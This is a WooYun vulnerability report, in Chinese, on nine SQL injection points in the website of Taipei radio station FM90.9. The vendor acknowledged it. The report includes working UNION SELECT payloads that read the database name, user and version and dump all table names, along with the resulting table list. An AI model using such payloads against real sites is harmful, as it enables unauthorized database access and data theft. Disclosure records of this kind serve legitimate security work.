当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0166085

漏洞标题:台北FM90.9官网8处SQL打包(DBA权限,部分可union)(臺灣地區)

相关厂商:台北FM90.9

漏洞作者: 路人甲

提交时间:2015-12-30 18:17

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-30: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

RT

详细说明:

站点:

http://**.**.**.**/


多处SQL漏洞
一、

http://**.**.**.**/content.php?view_group=1&view_type=165&view_mode=all
参数:view_group


SQL-11.png

SQL-10.png


二、

http://**.**.**.**/content.php?id=269503
参数id


SQL-20.png


三、

http://**.**.**.**/promotion.php?id=54621
参数id


SQL-30.png


四、

http://**.**.**.**/magazine.php?id=50880
参数id


SQL-40.png


五、可union

http://**.**.**.**/epaper_po.php?id=936
参数id


SQL-51.png


SQL-50.png


六、

http://**.**.**.**/ccm_content.php?id=19066
参数id


SQL-60.png


七、

http://**.**.**.**/classic_content.php?id=33456
参数id


SQL-70.png


八、可union

http://**.**.**.**/radio.php?id=254373
参数id


SQL-80.png


九、

http://**.**.**.**/forum.php?change_model=forum_list&id=1
参数id

SQL-90.png


===============================================================
数据库信息证明
数据库名:

http://**.**.**.**/epaper_po.php?id=936 UNION ALL SELECT concat(0x23,database(),0x23,user(),version(),0x23)#

SQL-52.png


SQL-52.png


#goodnews#[email protected]#


SQL-54.png


一句话搞定所有表:

http://**.**.**.**/epaper_po.php?id=936 UNION ALL SELECT GROUP_CONCAT(DISTINCT table_name) from information_schema.tables where table_schema=database()#


SQL-53.png


获取的表:

admins,admins_log,areacode,banner,banner_type,broadcast,broadcast_log,common_label,content,content_group,content_group_hex,content_keyword,content_log_action,content_log_factory,content_log_library,content_log_message,content_log_music,content_log_musicnews,content_log_news,content_log_program,content_log_publish,content_log_song,content_log_story,content_log_website,content_top,content_type_action,content_type_common,content_type_factory,content_type_host,content_type_magazine,content_type_message,content_type_music,content_type_news,content_type_program,content_type_promotion,content_type_publish,content_type_story,content_type_website,epaper,epaper_order,epaper_queue,epaper_type,faqs,faqs_type,forum,forum_group,forum_group_type,forum_post,forum_post_type,forum_reply,forum_vote,host,host_log,library_member,library_member_log,library_music,library_music_borrow,library_music_borrow_log,library_music_expand_log,library_music_log,library_music_song,library_music_type,live,marquee,marquee_log,marquee_type,member


未深入

漏洞证明:

已证明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-31 03:37

厂商回复:

感謝通報

最新状态:

暂无